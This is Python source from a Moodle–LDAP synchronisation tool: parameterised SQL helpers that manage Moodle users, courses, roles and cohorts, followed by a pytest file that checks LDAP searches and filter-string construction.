        " WHERE mco.shortname LIKE 'ZONE-PRIVEE-%%'" \
        " AND mco.shortname NOT IN ({ids_list})" \
        " AND mco.id = mc.instanceid" \
        " AND mc.contextlevel = 50" \
        " AND mc.id = mra.contextid" \
        " AND mra.userid = %(id_user)s" \
        .format(entete=self.entete, ids_list=ids_list)
    self.mark.execute(s, params={'id_user': id_user, **ids_list_params})
    result_set = self.mark.fetchall()
    if not result_set:
        return [], []
    # Split the (id, summary) rows into two parallel lists.
    ids = [result[0] for result in result_set]
    summaries = [result[1] for result in result_set]
    return ids, summaries


def get_ids_and_themes_not_allowed_roles(self, id_user, allowed_themes):
    """Return role-assignment ids and category themes for establishment-level
    roles the user should no longer hold.

    :param id_user: moodle id of the user
    :param allowed_themes: themes (establishment codes) the user may keep
    :return: tuple (list of role_assignment ids, list of themes)
    """
    # Build a safely parameterised IN (...) clause from the themes.
    ids_list, ids_list_params = array_to_safe_sql_list(allowed_themes, 'ids_list')
    # Roles on establishments that should no longer exist
    # (when the teacher is no longer attached to those establishments).
    s = "SELECT mra.id, mcc.theme" \
        " FROM {entete}course_categories mcc, {entete}context mc, {entete}role_assignments mra" \
        " WHERE mcc.theme NOT IN ({ids_list})" \
        " AND mcc.theme IS NOT NULL" \
        " AND mcc.id = mc.instanceid " \
        " AND mc.contextlevel = %(NIVEAU_CTX_CATEGORIE)s AND mc.depth = %(PROFONDEUR_CTX_ETAB)s" \
        " AND mc.id = mra.contextid" \
        " AND mra.userid = %(id_user)s" \
        .format(entete=self.entete, ids_list=ids_list)
    self.mark.execute(s, params={**ids_list_params, 'NIVEAU_CTX_CATEGORIE': self.constantes.niveau_ctx_categorie,
                                 'PROFONDEUR_CTX_ETAB': PROFONDEUR_CTX_ETAB, 'id_user': id_user})
    result_set = self.mark.fetchall()
    if not result_set:
        return [], []
    # Split the (id, theme) rows into two parallel lists.
    ids = [result[0] for result in result_set]
    themes = [result[1] for result in result_set]
    return ids, themes
def get_timestamp_now(self):
    """Return the current UNIX timestamp as computed by the database server.

    NOTE(review): the hard-coded ``- 3600*2`` looks like a fixed UTC+2
    timezone adjustment baked into the query — confirm before changing.
    """
    self.mark.execute("SELECT UNIX_TIMESTAMP( now( ) ) - 3600*2")
    return self.mark.fetchone()[0]
def get_users_ids(self, usernames):
    """Return the moodle user id of each given username.

    Delegates each lookup to ``get_user_id``; the result list is aligned
    with the input order (each entry is whatever ``get_user_id`` returns,
    e.g. None for an unknown username).

    :param usernames: iterable of usernames
    :return: list of user ids
    """
    # Idiom fix: list comprehension instead of a manual append loop.
    return [self.get_user_id(username) for username in usernames]
def user_has_role(self, userid, roles_list):
    """Return True if the user holds at least one of the given roles.

    :param userid: moodle id of the user
    :param roles_list: role ids to test for
    """
    ids_list, ids_list_params = array_to_safe_sql_list(roles_list, 'ids_list')
    query = ("SELECT COUNT(role.id)"
             " FROM {entete}role AS role"
             " INNER JOIN {entete}role_assignments AS role_assignments"
             " ON role.id = role_assignments.roleid"
             " WHERE role_assignments.userid = %(userid)s"
             " AND role.id IN ({ids_list})").format(entete=self.entete, ids_list=ids_list)
    self.mark.execute(query, params={'userid': userid, **ids_list_params})
    return self.mark.fetchone()[0] > 0
def get_all_valid_users(self):
    """Return (id, username, lastlogin) rows for every user not flagged deleted."""
    query = ("SELECT"
             " id AS id,"
             " username AS username,"
             " lastlogin AS lastlogin"
             " FROM {entete}user WHERE deleted = 0").format(entete=self.entete)
    self.mark.execute(query)
    return self.mark.fetchall()
def delete_users(self, user_ids, safe_mode=False):
    """Delete the given users from the database.

    :param user_ids: moodle ids of the users to delete
    :param safe_mode: when True, only rows already flagged deleted = 1 are removed
    """
    ids_list, ids_list_params = array_to_safe_sql_list(user_ids, 'ids_list')
    query = "DELETE FROM {entete}user WHERE id IN ({ids_list})".format(entete=self.entete,
                                                                       ids_list=ids_list)
    if safe_mode:
        query += " AND deleted = 1"
    self.mark.execute(query, params={**ids_list_params})


def delete_useless_users(self):
    """Remove every user row flagged deleted = 1."""
    self.mark.execute("DELETE FROM {entete}user WHERE deleted = 1".format(entete=self.entete))
def anonymize_users(self, user_ids):
    """Anonymise users in the database: every personally identifying column
    is overwritten with the configured anonymous placeholder values and the
    description is cleared.

    :param user_ids: moodle ids of the users to anonymise
    """
    # Build a safely parameterised IN (...) clause from the user ids.
    ids_list, ids_list_params = array_to_safe_sql_list(user_ids, 'ids_list')
    self.mark.execute("UPDATE {entete}user"
                      " SET firstname = %(anonymous_name)s,"
                      " lastname = %(anonymous_name)s,"
                      " firstnamephonetic = %(anonymous_name)s,"
                      " lastnamephonetic = %(anonymous_name)s,"
                      " middlename = %(anonymous_name)s,"
                      " alternatename = %(anonymous_name)s,"
                      " city = %(anonymous_name)s,"
                      " address = %(anonymous_name)s,"
                      " department = %(anonymous_name)s,"
                      " phone1 = %(anonymous_phone)s,"
                      " phone2 = %(anonymous_phone)s,"
                      " skype = %(anonymous_name)s,"
                      " yahoo = %(anonymous_name)s,"
                      " aim = %(anonymous_name)s,"
                      " msn = %(anonymous_name)s,"
                      " email = %(anonymous_mail)s,"
                      " description = NULL"
                      " WHERE id IN ({ids_list})"
                      .format(entete=self.entete, ids_list=ids_list),
                      params={
                          'anonymous_name': self.constantes.anonymous_name,
                          'anonymous_mail': self.constantes.anonymous_mail,
                          'anonymous_phone': self.constantes.anonymous_phone,
                          **ids_list_params
                      })
def insert_moodle_block(self, block_name, parent_context_id, show_in_subcontexts, page_type_pattern,
                        sub_page_pattern, default_region, default_weight):
    """Insert a block instance.

    timecreated/timemodified are computed server-side as "now minus two
    hours" — the same hard-coded offset used by ``get_timestamp_now``
    (presumably a UTC+2 adjustment; confirm before reuse).

    :param block_name: name of the block type
    :param parent_context_id: id of the parent context
    :param show_in_subcontexts: whether the block shows in sub-contexts
    :param page_type_pattern: moodle page-type pattern the block applies to
    :param sub_page_pattern: moodle sub-page pattern
    :param default_region: default display region
    :param default_weight: default ordering weight
    """
    s = "INSERT INTO {entete}block_instances " \
        "( blockname, parentcontextid, showinsubcontexts, pagetypepattern, subpagepattern, defaultregion, " \
        "defaultweight, timecreated, timemodified ) " \
        " VALUES ( %(block_name)s, %(parent_context_id)s, %(show_in_subcontexts)s, %(page_type_pattern)s, " \
        "%(sub_page_pattern)s, %(default_region)s, %(default_weight)s, UNIX_TIMESTAMP( now( ) ) - 3600*2," \
        "UNIX_TIMESTAMP( now( ) ) - 3600*2 )" \
        .format(entete=self.entete)
    self.mark.execute(s, params={'block_name': block_name,
                                 'parent_context_id': parent_context_id,
                                 'show_in_subcontexts': show_in_subcontexts,
                                 'page_type_pattern': page_type_pattern,
                                 'sub_page_pattern': sub_page_pattern,
                                 'default_region': default_region,
                                 'default_weight': default_weight})
def insert_moodle_context(self, context_level, depth, instance_id):
    """Insert a moodle context row.

    :param context_level: moodle context level
    :param depth: depth of the context in the hierarchy
    :param instance_id: id of the object the context is attached to
    """
    query = ("INSERT INTO {entete}context (contextlevel, instanceid, depth)"
             " VALUES (%(context_level)s, %(instance_id)s, %(depth)s)").format(entete=self.entete)
    self.mark.execute(query, params={'context_level': context_level,
                                     'instance_id': instance_id,
                                     'depth': depth})
def insert_moodle_course(self, id_category, full_name, id_number, short_name, summary, format_, visible,
                         start_date, time_created, time_modified):
    """Insert a course row.

    :param id_category: id of the parent course category
    :param full_name: full display name of the course
    :param id_number: external idnumber of the course
    :param short_name: short name of the course
    :param summary: course summary text
    :param format_: moodle course format (trailing underscore avoids
        shadowing the builtin ``format``)
    :param visible: visibility flag (0/1)
    :param start_date: course start timestamp
    :param time_created: creation timestamp
    :param time_modified: last-modification timestamp
    """
    s = "INSERT INTO {entete}course " \
        "(category, fullname, idnumber, shortname, summary, " \
        "format, visible, startdate, timecreated, timemodified) " \
        " VALUES (%(id_category)s, %(full_name)s, %(id_number)s, %(short_name)s, %(summary)s, " \
        "%(format)s, %(visible)s, %(start_date)s, %(time_created)s, %(time_modified)s)" \
        .format(entete=self.entete)
    self.mark.execute(s, params={'id_category': id_category,
                                 'full_name': full_name,
                                 'id_number': id_number,
                                 'short_name': short_name,
                                 'summary': summary,
                                 'format': format_,
                                 'visible': visible,
                                 'start_date': start_date,
                                 'time_created': time_created,
                                 'time_modified': time_modified})
def insert_moodle_course_category(self, name, id_number, description, theme):
    """Insert a course category (root-level, visible, sortorder 999 by default).

    :param name: display name of the category
    :param id_number: external idnumber
    :param description: category description
    :param theme: theme (establishment code) attached to the category
    """
    query = ("INSERT INTO {entete}course_categories"
             " (name, idnumber, description, parent, sortorder, coursecount, visible, depth,theme)"
             " VALUES(%(name)s, %(id_number)s, %(description)s, 0, 999,0, 1, 1, %(theme)s)").format(entete=self.entete)
    self.mark.execute(query, params={'name': name, 'id_number': id_number,
                                     'description': description, 'theme': theme})
def insert_moodle_course_module(self, course, module, instance, added):
    """Insert a course-module row.

    :param course: id of the course
    :param module: id of the module type
    :param instance: id of the module instance
    :param added: creation timestamp
    """
    query = ("INSERT INTO {entete}course_modules (course, module, instance, added)"
             " VALUES (%(course)s , %(module)s, %(instance)s , %(added)s)").format(entete=self.entete)
    self.mark.execute(query, params={'course': course, 'module': module,
                                     'instance': instance, 'added': added})
def insert_moodle_enrol_capability(self, enrol, status, course_id, role_id):
    """Insert an enrolment method for a course.

    :param enrol: enrolment plugin name
    :param status: status flag of the method
    :param course_id: id of the course
    :param role_id: id of the role given on enrolment
    """
    query = ("INSERT INTO {entete}enrol(enrol, status, courseid, roleid)"
             " VALUES(%(enrol)s, %(status)s, %(course_id)s, %(role_id)s)").format(entete=self.entete)
    self.mark.execute(query, params={'enrol': enrol, 'status': status,
                                     'course_id': course_id, 'role_id': role_id})
def insert_moodle_forum(self, course, name, intro, intro_format, max_bytes, max_attachements, time_modified):
    """Insert a forum row attached to *course*.

    :param course: id of the owning course
    :param name: forum name
    :param intro: forum introduction text
    :param intro_format: format of the introduction text
    :param max_bytes: maximum attachment size
    :param max_attachements: maximum number of attachments
    :param time_modified: last-modification timestamp
    """
    query = ("INSERT INTO {entete}forum (course, name, intro, introformat, maxbytes, maxattachments, timemodified) "
             "VALUES (%(course)s, %(name)s, %(intro)s, %(intro_format)s, %(max_bytes)s, %(max_attachements)s, "
             "%(time_modified)s)").format(entete=self.entete)
    self.mark.execute(query, params={'course': course,
                                     'name': name,
                                     'intro': intro,
                                     'intro_format': intro_format,
                                     'max_bytes': max_bytes,
                                     'max_attachements': max_attachements,
                                     'time_modified': time_modified})
def is_moodle_local_admin(self, id_context_categorie, id_user):
    """Return True if the user is a local administrator of the given context.

    :param id_context_categorie: id of the category context
    :param id_user: moodle id of the user
    """
    role_id = self.get_id_role_admin_local()
    query = ("SELECT COUNT(id) FROM {entete}role_assignments"
             " WHERE roleid = %(id_role_admin_local)s"
             " AND contextid = %(id_context_categorie)s"
             " AND userid = %(id_user)s").format(entete=self.entete)
    self.mark.execute(query, params={'id_role_admin_local': role_id,
                                     'id_context_categorie': id_context_categorie,
                                     'id_user': id_user})
    return self.safe_fetchone()[0] > 0
def insert_moodle_local_admin(self, id_context_categorie, id_user):
    """Grant the local-admin role to a user on the given context.

    :param id_context_categorie: id of the category context
    :param id_user: moodle id of the user
    :return: True when a new assignment was inserted, False when it already existed
    """
    if self.is_moodle_local_admin(id_context_categorie, id_user):
        return False
    role_id = self.get_id_role_admin_local()
    query = ("INSERT ignore INTO {entete}role_assignments(roleid, contextid, userid)"
             " VALUES (%(id_role_admin_local)s, %(id_context_categorie)s, %(id_user)s)").format(entete=self.entete)
    self.mark.execute(query, params={'id_role_admin_local': role_id,
                                     'id_context_categorie': id_context_categorie,
                                     'id_user': id_user})
    return True
def insert_moodle_user(self, username, first_name, last_name, email, mail_display, theme):
    """Insert a user into Moodle unless one with that username already exists.

    Usernames are stored lowercased.

    :param username: login of the user (normalised to lowercase)
    :param first_name: first name
    :param last_name: last name
    :param email: email address
    :param mail_display: moodle maildisplay setting
    :param theme: moodle theme to apply
    """
    # BUG FIX: lowercase BEFORE the existence lookup. The original lowered
    # the username only after calling get_user_id, so a mixed-case input
    # would not match the lowercased row inserted on a previous run and a
    # duplicate would be created.
    # NOTE(review): if get_user_id already lowercases its argument this is
    # a no-op — confirm against its definition.
    username = username.lower()
    user_id = self.get_user_id(username)
    if user_id is None:
        s = "INSERT INTO {entete}user" \
            " (auth, confirmed, username, firstname, lastname, email, maildisplay, city, country, lang," \
            " mnethostid, theme )" \
            " VALUES (%(auth)s, %(confirmed)s, %(username)s, %(firstname)s, %(lastname)s, %(email)s," \
            " %(maildisplay)s, %(city)s, %(country)s, %(lang)s, %(mnethostid)s, %(theme)s)" \
            .format(entete=self.entete)
        self.mark.execute(s, params={'auth': USER_AUTH,
                                     'confirmed': 1,
                                     'username': username,
                                     'firstname': first_name,
                                     'lastname': last_name,
                                     'email': email,
                                     'maildisplay': mail_display,
                                     'city': USER_CITY,
                                     'country': USER_COUNTRY,
                                     'lang': USER_LANG,
                                     'mnethostid': USER_MNET_HOST_ID,
                                     'theme': theme})
def insert_moodle_user_info_data(self, id_user, id_field, data):
    """Insert a user_info_data row (custom-field value for a user).

    :param id_user: moodle id of the user
    :param id_field: id of the custom field
    :param data: value to store
    """
    query = ("INSERT INTO {entete}user_info_data (userid, fieldid, data)"
             " VALUES (%(id_user)s, %(id_field)s, %(data)s)").format(entete=self.entete)
    self.mark.execute(query, params={'id_user': id_user, 'id_field': id_field, 'data': data})
def insert_moodle_user_info_field(self, short_name, name, data_type, id_category, param1, param2, locked, visible):
    """Insert a custom user-info field definition.

    :param short_name: short name of the field
    :param name: display name of the field
    :param data_type: moodle data type of the field
    :param id_category: id of the field category
    :param param1: type-specific parameter 1
    :param param2: type-specific parameter 2
    :param locked: locked flag
    :param visible: visibility flag
    """
    query = ("INSERT INTO {entete}user_info_field"
             " (shortname, name, datatype, categoryid, param1, param2, locked, visible)"
             " VALUES (%(short_name)s, %(name)s, %(data_type)s, %(id_category)s, %(param1)s, %(param2)s, %(locked)s,"
             " %(visible)s)").format(entete=self.entete)
    self.mark.execute(query, params={'short_name': short_name,
                                     'name': name,
                                     'data_type': data_type,
                                     'id_category': id_category,
                                     'param1': param1,
                                     'param2': param2,
                                     'locked': locked,
                                     'visible': visible})
def insert_zone_privee(self, id_categorie_etablissement, siren, ou, time):
    """Create the "private zone" course of an establishment, or return the
    existing one.

    :param id_categorie_etablissement: id of the establishment category
    :param siren: SIREN of the establishment (interpolated into the shortname)
    :param ou: establishment name, interpolated into the course summary
    :param time: timestamp used for startdate/timecreated/timemodified
    :return: id of the private-zone course
    """
    full_name = COURSE_FULLNAME_ZONE_PRIVEE
    id_number = short_name = COURSE_SHORTNAME_ZONE_PRIVEE % siren
    # BUG FIX: interpolating ou.encode("utf-8") (bytes) into a str pattern
    # yields "b'...'" under Python 3, corrupting the summary; interpolate
    # the str value directly.
    summary = COURSE_SUMMARY_ZONE_PRIVEE % ou
    format_ = COURSE_FORMAT_ZONE_PRIVEE
    visible = COURSE_VISIBLE_ZONE_PRIVEE
    start_date = time_created = time_modified = time
    id_zone_privee = self.get_id_course_by_id_number(id_number)
    if id_zone_privee is not None:
        return id_zone_privee
    self.insert_moodle_course(id_categorie_etablissement, full_name, id_number, short_name, summary, format_,
                              visible, start_date, time_created, time_modified)
    return self.get_id_course_by_id_number(id_number)
def insert_zone_privee_context(self, id_zone_privee):
    """Return the context id of the private-zone course, creating it if needed.

    :param id_zone_privee: id of the private-zone course
    :return: id of its course context
    """
    ctx_id = self.get_id_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE,
                                 id_zone_privee)
    if ctx_id:
        return ctx_id
    # A context may already exist with another depth: reuse it rather than
    # inserting a duplicate.
    ctx_id = self.get_id_context_no_depth(self.constantes.niveau_ctx_cours, id_zone_privee)
    if ctx_id:
        return ctx_id
    self.insert_moodle_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE,
                               id_zone_privee)
    return self.get_id_context(self.constantes.niveau_ctx_cours, PROFONDEUR_CTX_ZONE_PRIVEE,
                               id_zone_privee)
def purge_cohorts(self, users_ids_by_cohorts_ids):
    """Purge cohorts: remove from each cohort every member whose user id is
    not in the provided keep-list.

    :param users_ids_by_cohorts_ids: dict mapping cohort id -> list of user
        ids that belong to that cohort (members to KEEP)
    """
    for cohort_id, kept_users_ids in users_ids_by_cohorts_ids.items():
        ids_list, ids_list_params = array_to_safe_sql_list(kept_users_ids, 'ids_list')
        query = ("DELETE FROM {entete}cohort_members"
                 " WHERE cohortid = %(cohort_id)s"
                 " AND userid NOT IN ({ids_list})").format(entete=self.entete, ids_list=ids_list)
        self.mark.execute(query, params={'cohort_id': cohort_id, **ids_list_params})
def get_user_filtered_cohorts(self, contextid, cohortname_pattern):
    """Return the cohorts of a context whose name matches the given pattern.

    :param contextid: id of the context owning the cohorts
    :param cohortname_pattern: SQL LIKE pattern for the cohort name
    :return: list of Cohort objects
    """
    query = ("SELECT id, contextid, name FROM {entete}cohort"
             " WHERE contextid = %(contextid)s AND name LIKE %(like)s").format(entete=self.entete)
    self.mark.execute(query, params={'contextid': contextid,
                                     'like': cohortname_pattern})
    rows = self.mark.fetchall()
    return [Cohort(cohortid=row[0], contextid=row[1], name=row[2]) for row in rows]
def get_cohort_members(self, cohortid):
    """Return an iterable of the usernames belonging to the cohort.

    :param cohortid: id of the cohort
    :return: lazy iterable (map) of usernames
    """
    query = ("SELECT {entete}user.username FROM {entete}cohort_members AS cohort_members"
             " INNER JOIN {entete}user ON cohort_members.userid = {entete}user.id"
             " WHERE cohortid = %(cohortid)s").format(entete=self.entete)
    self.mark.execute(query, params={'cohortid': cohortid})
    # Lazy map, as historically returned; callers may iterate it once.
    return map(lambda row: row[0], self.mark.fetchall())
def update_context_path(self, id_context, new_path):
    """Set the path of a context row.

    :param id_context: id of the context
    :param new_path: new path value
    """
    query = ("UPDATE {entete}context"
             " SET path = %(new_path)s"
             " WHERE id = %(id_context)s").format(entete=self.entete)
    self.mark.execute(query, params={'new_path': new_path, 'id_context': id_context})


def update_course_category_description(self, id_category, new_description):
    """Set the description of a course category.

    :param id_category: id of the category
    :param new_description: new description value
    """
    query = ("UPDATE {entete}course_categories"
             " SET description = %(new_description)s"
             " WHERE id = %(id_category)s").format(entete=self.entete)
    self.mark.execute(query, params={'new_description': new_description, 'id_category': id_category})


def update_course_category_name(self, id_category, new_name):
    """Set the name of a course category.

    :param id_category: id of the category
    :param new_name: new name value
    """
    query = ("UPDATE {entete}course_categories"
             " SET name = %(new_name)s"
             " WHERE id = %(id_category)s").format(entete=self.entete)
    self.mark.execute(query, params={'new_name': new_name, 'id_category': id_category})


def update_course_category_path(self, id_category, new_path):
    """Set the path of a course category.

    :param id_category: id of the category
    :param new_path: new path value
    """
    query = ("UPDATE {entete}course_categories"
             " SET path = %(new_path)s"
             " WHERE id = %(id_category)s").format(entete=self.entete)
    self.mark.execute(query, params={'new_path': new_path, 'id_category': id_category})
def update_moodle_user(self, id_user, first_name, last_name, email, mail_display, theme):
    """Update an existing moodle user's identity fields.

    Also resets auth/city/country/lang/mnethostid to the module-level
    defaults (USER_AUTH, USER_CITY, ...), mirroring insert_moodle_user.

    :param id_user: moodle id of the user to update
    :param first_name: new first name
    :param last_name: new last name
    :param email: new email address
    :param mail_display: moodle maildisplay setting
    :param theme: moodle theme to apply
    """
    s = "UPDATE {entete}user" \
        " SET auth = %(USER_AUTH)s, firstname = %(first_name)s, lastname = %(last_name)s, email = %(email)s," \
        " maildisplay = %(mail_display)s, city = %(USER_CITY)s, country = %(USER_COUNTRY)s, lang = %(USER_LANG)s," \
        " mnethostid = %(USER_MNET_HOST_ID)s, theme = %(theme)s" \
        " WHERE id = %(id_user)s" \
        .format(entete=self.entete)
    self.mark.execute(s, params={'USER_AUTH': USER_AUTH,
                                 'first_name': first_name,
                                 'last_name': last_name,
                                 'email': email,
                                 'mail_display': mail_display,
                                 'USER_CITY': USER_CITY,
                                 'USER_COUNTRY': USER_COUNTRY,
                                 'USER_LANG': USER_LANG,
                                 'USER_MNET_HOST_ID': USER_MNET_HOST_ID,
                                 'theme': theme,
                                 'id_user': id_user})
def update_user_info_data(self, id_user, id_field, new_data):
    """Overwrite the data of an existing user_info_data row.

    :param id_user: moodle id of the user
    :param id_field: id of the custom field
    :param new_data: new value to store
    """
    query = ("UPDATE {entete}user_info_data"
             " SET data = %(new_data)s "
             " WHERE userid = %(id_user)s"
             " AND fieldid = %(id_field)s").format(entete=self.entete)
    self.mark.execute(query, params={'new_data': new_data, 'id_user': id_user, 'id_field': id_field})
def get_field_domaine(self):
    """Return the id of the custom user-info field 'Domaine'.

    :return: the field id, or 0 when the field does not exist yet
        (0 is the sentinel callers expect)
    """
    sql = ("SELECT id"
           " FROM {entete}user_info_field"
           " WHERE shortname = 'Domaine'"
           " AND name ='Domaine'").format(entete=self.entete)
    self.mark.execute(sql)
    rows = self.mark.fetchall()
    # Cleanup: the original pre-initialised the result to an empty list that
    # was always overwritten; a conditional expression states it directly.
    return rows[0][0] if rows else 0
def is_enseignant_avance(self, id_user, id_role_enseignant_avance):
    """Return True if the user already holds the 'advanced teacher' role.

    :param id_user: moodle id of the user
    :param id_role_enseignant_avance: id of the advanced-teacher role
    """
    sql = ("SELECT COUNT(id)"
           " FROM {entete}role_assignments"
           " WHERE userid = %(id_user)s"
           " AND roleid = %(id_role_enseignant_avance)s").format(entete=self.entete)
    self.mark.execute(sql, params={'id_user': id_user,
                                   'id_role_enseignant_avance': id_role_enseignant_avance})
    return self.safe_fetchone()[0] > 0
def set_user_domain(self, id_user, id_field_domaine, user_domain):
    """Store the 'Domaine' custom-field value of a moodle user.

    Updates the existing user_info_data row in place (REPLACE on its id)
    when one exists, otherwise inserts a new row.

    :param id_user: moodle id of the user
    :param id_field_domaine: id of the 'Domaine' user_info_field
    :param user_domain: domain value to store
    """
    # For a user already present in "user_info_data" but with a different
    # domain than "user_domain", blindly INSERTing a row with the new domain
    # would fail; the lookup therefore matches on (userid, fieldid) only.
    # Historical variant that also filtered on the data column:
    # sql = "SELECT id FROM %suser_info_data WHERE userid = %s AND fieldid = %s AND data = '%s'"
    sql = "SELECT id" \
          " FROM {entete}user_info_data" \
          " WHERE userid = %(id_user)s" \
          " AND fieldid = %(id_field_domaine)s" \
          " LIMIT 1" \
          .format(entete=self.entete)
    self.mark.execute(sql, params={'id_user': id_user, 'id_field_domaine': id_field_domaine})
    result = self.safe_fetchone()
    if result:
        # Row exists: REPLACE keeps the same primary key and rewrites the data.
        sql = "REPLACE INTO {entete}user_info_data " \
              "(id, userid, fieldid, data)" \
              " VALUES (%(id)s, %(id_user)s, %(id_field_domaine)s, %(user_domain)s)" \
              .format(entete=self.entete)
        self.mark.execute(sql, params={'id': result[0],
                                       'id_user': id_user,
                                       'id_field_domaine': id_field_domaine,
                                       'user_domain': user_domain})
    else:
        sql = "INSERT INTO {entete}user_info_data " \
              "(userid, fieldid, data)" \
              " VALUES (%(id_user)s, %(id_field_domaine)s, %(user_domain)s)" \
              .format(entete=self.entete)
        self.mark.execute(sql, params={'id_user': id_user,
                                       'id_field_domaine': id_field_domaine,
                                       'user_domain': user_domain})
| {"/test/test_timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/timestamp.py": ["/synchromoodle/config.py"], "/synchromoodle/arguments.py": ["/synchromoodle/__version__.py"], "/synchromoodle/dbutils.py": ["/synchromoodle/config.py"], "/test/test_ldaputils.py": ["/synchromoodle/config.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/webserviceutils.py": ["/synchromoodle/config.py"], "/test/conftest.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/synchromoodle/__main__.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py"], "/synchromoodle/actions.py": ["/synchromoodle/synchronizer.py", "/synchromoodle/timestamp.py", "/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py"], "/test/utils/db_utils.py": ["/synchromoodle/dbutils.py"], "/synchromoodle/ldaputils.py": ["/synchromoodle/config.py"], "/test/utils/ldap_utils.py": ["/synchromoodle/ldaputils.py"], "/synchromoodle/synchronizer.py": ["/synchromoodle/arguments.py", "/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/webserviceutils.py"], "/test/test_config.py": ["/synchromoodle/config.py"], "/test/test_synchronizer.py": ["/synchromoodle/config.py", "/synchromoodle/dbutils.py", "/synchromoodle/ldaputils.py", "/synchromoodle/synchronizer.py"]} |
78,259 | GIP-RECIA/ESCOSynchroMoodle | refs/heads/develop | /test/test_ldaputils.py | # coding: utf-8
from datetime import datetime
import pytest
from ldap3 import Connection
from synchromoodle import ldaputils
from synchromoodle.config import Config
from synchromoodle.ldaputils import Ldap, StructureLdap, PersonneLdap, EleveLdap, EnseignantLdap
from test.utils import ldap_utils
# Reference timestamp reused by the filter tests below (rendered as
# "20190409214201Z" in the expected LDAP filter strings).
datetime_value = datetime(2019, 4, 9, 21, 42, 1)


@pytest.fixture(scope='function')
def ldap(docker_config: Config):
    """Provide a fresh Ldap helper wired to the docker test config, with the
    directory contents reset before each test."""
    ldap = Ldap(docker_config.ldap)
    ldap_utils.reset(ldap)
    return ldap
def test_connection(ldap: Ldap):
    """connect() exposes a live Connection; disconnect() clears it."""
    ldap.connect()
    assert isinstance(ldap.connection, Connection)
    ldap.disconnect()
    assert ldap.connection is None


def test_structures(ldap: Ldap):
    """Structures from the fixture LDIF are searchable and fetchable by UAI."""
    ldap.connect()
    ldap_utils.run_ldif('data/default-structures.ldif', ldap)
    found = ldap.search_structure()
    assert len(found) == 2
    for item in found:
        assert isinstance(item, StructureLdap)
        assert isinstance(ldap.get_structure(item.uai), StructureLdap)
    ldap.disconnect()


def test_structures_empty(ldap: Ldap):
    """An empty directory yields no structures."""
    ldap.connect()
    assert len(ldap.search_structure()) == 0
    ldap.disconnect()


def test_personnes(ldap: Ldap):
    """All 77 fixture persons come back as PersonneLdap objects."""
    ldap.connect()
    ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
    found = ldap.search_personne()
    assert len(found) == 77
    assert all(isinstance(item, PersonneLdap) for item in found)
    ldap.disconnect()


def test_personnes_empty(ldap: Ldap):
    """An empty directory yields no persons."""
    ldap.connect()
    assert len(ldap.search_personne()) == 0
    ldap.disconnect()


def test_eleves(ldap: Ldap):
    """Student entries come back as EleveLdap objects."""
    ldap.connect()
    ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
    found = ldap.search_eleve()
    assert len(found) > 0
    assert all(isinstance(item, EleveLdap) for item in found)
    ldap.disconnect()


def test_eleves_empty(ldap: Ldap):
    """An empty directory yields no students."""
    ldap.connect()
    assert len(ldap.search_eleve()) == 0
    ldap.disconnect()


def test_teachers(ldap: Ldap):
    """Teacher entries come back as EnseignantLdap objects."""
    ldap.connect()
    ldap_utils.run_ldif('data/default-personnes-short.ldif', ldap)
    found = ldap.search_enseignant()
    assert len(found) > 0
    assert all(isinstance(item, EnseignantLdap) for item in found)
    ldap.disconnect()


def test_teachers_empty(ldap: Ldap):
    """An empty directory yields no teachers."""
    ldap.connect()
    assert len(ldap.search_enseignant()) == 0
    ldap.disconnect()
def test_get_filtre_eleves():
    """The student LDAP filter composes objectClass, UAI and timestamp clauses."""
    assert ldaputils._get_filtre_eleves() == \
           "(&(objectClass=ENTEleve))"
    assert ldaputils._get_filtre_eleves(uai="some-uai") == "(&(objectClass=ENTEleve)(ESCOUAI=some-uai))"
    assert ldaputils._get_filtre_eleves(since_timestamp=datetime_value) == \
           "(&(objectClass=ENTEleve)(modifyTimeStamp>=20190409214201Z))"
    assert ldaputils._get_filtre_eleves(since_timestamp=datetime_value, uai="other-uai") == \
           "(&(objectClass=ENTEleve)(ESCOUAI=other-uai)(modifyTimeStamp>=20190409214201Z))"


def test_get_filtre_etablissement():
    """The establishment filter always excludes the dummy SIREN and may pin a UAI."""
    assert ldaputils._get_filtre_etablissement("0290009C") == "(&(ObjectClass=ENTEtablissement)" \
                                                             "(!(ENTStructureSiren=0000000000000A))" \
                                                             "(ENTStructureUAI=0290009C))"
    assert ldaputils._get_filtre_etablissement() == "(&(ObjectClass=ENTEtablissement)" \
                                                   "(!(ENTStructureSiren=0000000000000A)))"


def test_get_filtre_personnes():
    """Extra keyword clauses may come out in either dict order, hence the two
    accepted variants."""
    assert ldaputils._get_filtre_personnes(datetime_value) == \
           "(&(|(objectClass=ENTPerson))(!(uid=ADM00000))" \
           "(modifyTimeStamp>=20190409214201Z))"
    assert ldaputils._get_filtre_personnes(datetime_value, foo="bar", hello=["world", "dude"]) in \
           ["(&(|(objectClass=ENTPerson))"
            "(!(uid=ADM00000))"
            "(|(foo=bar)(hello=world)(hello=dude))"
            "(modifyTimeStamp>=20190409214201Z))",
            "(&(|(objectClass=ENTPerson))"
            "(!(uid=ADM00000))"
            "(|(hello=world)(hello=dude)(foo=bar))"
            "(modifyTimeStamp>=20190409214201Z))"]


def test_get_filtre_enseignants():
    """The teacher filter optionally adds non-teaching staff classes, UAI and
    timestamp clauses."""
    assert ldaputils.get_filtre_enseignants() == "(&(objectClass=ENTAuxEnseignant)" \
                                                "(!(uid=ADM00000)))"
    assert ldaputils.get_filtre_enseignants(datetime_value, "UAI00000", True) == \
           "(&" \
           "(|(objectClass=ENTAuxEnseignant)" \
           "(objectClass=ENTAuxNonEnsEtab)" \
           "(objectClass=ENTAuxNonEnsCollLoc)" \
           ")" \
           "(!(uid=ADM00000))" \
           "(ESCOUAI=UAI00000)" \
           "(modifyTimeStamp>=20190409214201Z))"
